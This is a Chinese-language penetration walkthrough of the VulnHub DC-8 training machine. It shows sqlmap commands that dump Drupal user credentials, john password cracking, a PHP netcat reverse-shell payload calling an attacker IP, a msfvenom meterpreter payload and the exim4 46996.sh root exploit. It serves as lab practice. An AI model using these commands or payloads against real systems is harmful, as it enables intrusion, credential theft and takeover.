这次渗透是DC系列(VulnHub的仿真靶机)的DC-8,包含了sql注入、suid-exim4提权等知识。
VulnHub靶机渗透之DC-8 【DC系列】
dc8靶机下载链接:
https://www.vulnhub.com/entry/dc-8,367/
https://www.vulnhub.com/entry/dc-9,412/
运行系统:kali+ dc-8
平台:vmware workstation
网络:均使用nat
任务:拿到root权限,找到flag
发现主机->192.168.124.138
端口服务扫描-> 22 、80端口开放、robots.txt存在
访问robots.txt找到登录界面
http://192.168.124.138/robots.txt |
找到了用户登录地址
找到sql注入点
添加单引号,报错了
爆库
sqlmap http://192.168.124.138/?nid=2 --dbs |
爆表
sqlmap http://192.168.124.138/?nid=2 -D d7db --tables |
爆字段
sqlmap http://192.168.124.138/?nid=2 -D d7db -T users --columns |
脱裤
sqlmap http://192.168.124.138/?nid=2 -D d7db -T users -C name,pass --dump |
将密码hash保存到admin_john文件中,使用john破解
admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
john爆破密码成功
john/turtle
登录成功
搜索网站一通,点击左上角content->点击edit->点击webforms->点击form settings->点击下拉框选择php code
此处不能用一句话木马,而要反弹shell的payload,因为(此处无法找到路径所以用反弹shell)
上图无法利用
<?php system("nc 192.168.124.134 1234 -e /bin/bash"); ?> |
在网页随意提交一个评论,启动连接
shell弹不出来,没办法了
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.124.134 port=4444 -f raw |
通过发送邮件的方式来触发木马文件
shell |
find查询带有suid权限的命令
查看靶机exim4的版本【4.89】
使用exim4提权需要拥有写权限,tmp目录下写文件。
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /tmp |
cd /tmp |
成功
./46996.sh -m netcat |
参考链接
https://blog.csdn.net/weixin_44288604/article/details/122944302 【vulnhub之DC8靶机】
https://blog.csdn.net/qq_42094992/article/details/109100082 【入侵靶机DC-8】
https://www.exploit-db.com/exploits/46996
https://www.cnblogs.com/allworldg/p/15158444.html
Vulnhub-DC8 龙蜀安全